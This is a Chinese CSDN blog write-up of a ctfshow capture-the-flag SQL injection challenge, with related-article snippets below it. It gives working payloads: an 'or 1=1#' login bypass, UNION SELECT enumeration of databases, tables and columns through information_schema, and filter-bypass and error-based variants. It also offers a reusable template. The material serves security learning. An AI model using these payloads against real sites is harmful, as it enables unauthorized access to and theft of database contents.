web23最简单的SQL注入

最新推荐文章于 2024-04-29 20:28:03 发布
最新推荐文章于 2024-04-29 20:28:03 发布
阅读量225 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59453707/article/details/119481514
版权

SQL注入 Burp Suite 数据库探测 安全漏洞 万能密码
关键词由CSDN通过智能技术生成

打开靶场

首先随便输入admin admin 

没有报错,但是清空了

输入万能密匙1'or1=1# 

同样被清空了 

题目提示有sql注入,那就使用burp抓包,发送到repeater

因为是登入页面,那就选择使用万能密码 1’ or 1=1 # ,出现欢迎您,ctfshow,说明登录成功,这里username=1’ or 1=1 #password=123这条语句,#号是注释符,所以后面的语句是被注释掉的,所以剩下username=1’ or 1=1,or是只要满足一个条件就可以,1=1永远是满足的

 接下来判断字段数 1'or 1=1 union select 1,2,3 #,出现欢迎你,说明有三个字段

 接下来查库

username=1' or 1=1 union select 1,database(),3 #$password=123

查表

username=1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="web2"#&password=admin

 查字段

username=1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="flag"#&password=admin

 查值

username=1'or 1=1 union select 1,flag,3 from flag#&password=admin

 得到flag

总结:

查库

union select 1,2,3,database(); #   //这里得看有多少字段

 查表

union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema="库名" #

查字段

union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="表名" #

查值

union select 1,2,3,字段 from 表名; #

Dream651
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧web简单sql注入1
The Road Of Sec
05-06 8496
0x.部分题解 一、通过加英文单引号1‘ ,检测到存在注入:   php?id=1   二、按常规步骤输入1 and 1=1和1 and 1=2的时候,发现报了“SQLi deteced!”而无法查询:php?1 and 1=1  php?1 and 1=2       那么,去掉空格输入1and1=1和1and1=2呢?       确定是过滤了空格!
sql简单注入
weixin_51646864的博客
06-13 673
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
web安全之SQL注入
最新发布
weixin_45997442的博客
04-29 872
SQL注入Web安全界地位很高的一个漏洞,它把矛头对准网站最为重要的数据库,利用成本低而危害巨大。若说一个普通开发人员有那么点儿安全意识,那一定和SQL注入有关。如今随着Web安全逐渐被重视,大家安全意识提升,同时各种预编译框架、ORM层出不穷,SQL注入已不像10年前那么泛滥,那么SQL注入的前世今生是怎样的?在这个预编译时代,SQL注入为何仍未销声匿迹?而预编译的底层又有哪些细节需要安全工程师知晓?这将是本文所重点探究之处。
一个简单SQL注入攻击
train的专栏
05-18 4748
在上一篇博客中:http://blog.csdn.net/suwei19870312/article/details/7579667。讲了Client 端代码和Server端代码的交互。 Client端代码通过GET method,向Server端代码user.php传递了一个参数q, 在user.php代码中使用参数q来构建访问数据库的SQL语句: $sql="SELECT *
实验吧简单sql注入解题思路
ZweLL032的博客
03-17 8286
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag fro
第12天-Web漏洞——SQL注入之简易sql注入
MCTSOG的博客
01-19 1240
SQL注入 SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术 sql注入产生原因 接收数据 拼接数据 数据库执行 结果展示— 四个步骤,过程中处理不当就可能会存在注入漏洞 sql注入漏洞,取决于过滤严谨与否,过滤严谨,基本不可能存在sql注入漏洞,反之,就可能存在! SQL注入的危害 1.危害数据库里的数据 2.直接危害网站的权限 SQL 注入知识结构 mysql数据库注入 mysql数据库 数据库A=网站A=数据库用户A 表名——> 列名 ——>
SQL注入漏洞简单挖掘-01
09-15
SQL注入漏洞简单挖掘-01 SQL注入漏洞是Web应用程序中的一种常见漏洞,它是由于Web应用程序对用户输入的不当处理所导致的。SQL注入漏洞的成因是由于Web应用程序使用用户输入数据构建SQL语句时,没有正确地过滤和转义...
PHP简单预防sql注入的方法
10-21
参数化查询是防止SQL注入的最有效方法。它将SQL语句和参数分开处理,使得攻击者无法改变SQL结构。例如,使用PDO扩展时,你可以这样做: ```php $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id"); ...
Web环境下SQL注入攻击的检测
03-03
SQL注入攻击】是Web应用安全领域的一个严重威胁,它主要利用了编程人员在开发时对用户输入数据处理不当的漏洞。攻击者可以通过构造特定的输入,使应用程序执行非预期的SQL命令,从而获取未经授权的数据或者对...
SQL注入思路详解
12-14
由于很多网站有WAF(Web应用防火墙)或代码级别的过滤器,测试时通常会选择最简单的payload,如数字型和字符型测试,观察服务器的响应以判断注入是否成功。 - 数字型测试:例如,攻击者可能会尝试在数字字段后面...
SQL注入绕过实战案例
08-31
SQL注入(SQL Injection)是攻击者在Web应用的输入参数中插入恶意SQL代码,从而控制或操纵后台数据库服务器的一种技术。这种攻击通常发生在开发者未能充分验证用户输入的情况下。例如,一个简单的登录表单,如果未对...
Ctfshow——web2简单SQL注入
yu_19980401的博客
09-27 464
Ctfshow——web2 简单SQL注入 万能密码登录 username=admin'+or+1=1#&password=123 出现登录成功的提示 查询列数 username=admin'+or+1=1+order+by+1,2,3#&password=123 3回显正常,4无回显,判断有3列 查询数据库名 username=admin'+or+1=1+union+select+1,database(),3#&password=123 查询数据库内数据表 u
Web安全入门(ACCESS手工注入)
aifan8968的博客
07-11 181
  先说一下SQL注入的概念,这里引用百度上的解释:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。...
web安全之简单sql注入
weixin_43917429的博客
09-03 187
步骤: 1 输入1’,看是否会显示错误。(检查是否存在注入点,如果后台处理了这个单引号,说明存在sql的注入漏洞,以此推测后台代码为select name form 某表 where id=‘user_input’) 2 输入1’ and 1=1 (如果依然显示错误,说明后台进行了某些过滤,然后我们观察网页的url,发现空格都已经被换成了+号,说明对空格进行了过滤,那我们在输入时就要将空格全部变...
简单sql注入——实验吧
weixin_34290631的博客
07-11 455
刚刚做了实验吧的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 简单sql注入分值:10 来源:实验吧 难度:中 参与人数:18007人 Get Flag:5644人 答题人数:651...
WEB漏洞——SQL注入之简要SQL注入
qq_52589245的博客
10-06 2972
前言 sql注入是比较常见的网络攻击方式之一, 他不是利用操作系统的bug来实现攻击,而是针对程序员编写时的疏忽,通过sql语句,实现无账号登录,甚至篡改数据库。 sql简介 sql是一门ANSI的标准计算机语言, 用来访问和操作书序库系统。 sql语句用于取回和更新数据库中的数据。sql可与数据库程序协同工作,比如MS Access, DB2 , informinx, mssql Server,Oracle, Sybase 以及其他数据库系统。 sql注入 ...
CTFshow--Web2,简单SQL注入
weixin_46637933的博客
02-28 414
SQL注入先找到注入点,然后测试字段:admin' or 1=1 union select 1,2,3 <!-- 该题过滤了空格符,所以用/**/做了绕过 有回显则爆库名:admin' or 1=1 union select 1,database(),3 接着爆库内表:admin' or 1=1 union select 1,group_concat(table_name),3 form information_schema.tables where table_schema='web2'
CTFshow web 2 简单SQL注入
qq_43039823的博客
07-23 189
打开题目显示是一个简单的登录界面,拿到题目,先试一下万能密码 admin' or 1=1# 123 没有限制的登陆成功,使用burp抓一下包,然后开始下一步。 bp抓包内容如下,发送到RP模块(重发器) 现在开始人工苦比的手动注入 首先是查看回显位 username=admin'or1=1unionselect1,2,3#&password=123 GO! 回显位确认为 2 下一步,爆库名 username=admin'or1=1uni...
实验吧Web-易-简单sql注入之3(报错的sql盲注之exp)
Sea_Sand息禅
12-18 357
题目提示是报错注入,于是就用盲注技巧来注入。 这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧) 1.爆库 ' or exp(~(select * from(select database())a))# 这里最后面的a处可为别的字母,且必须要有 可以看到库名为web1。 2,爆表 ' or exp(~(...
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf
07-08
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值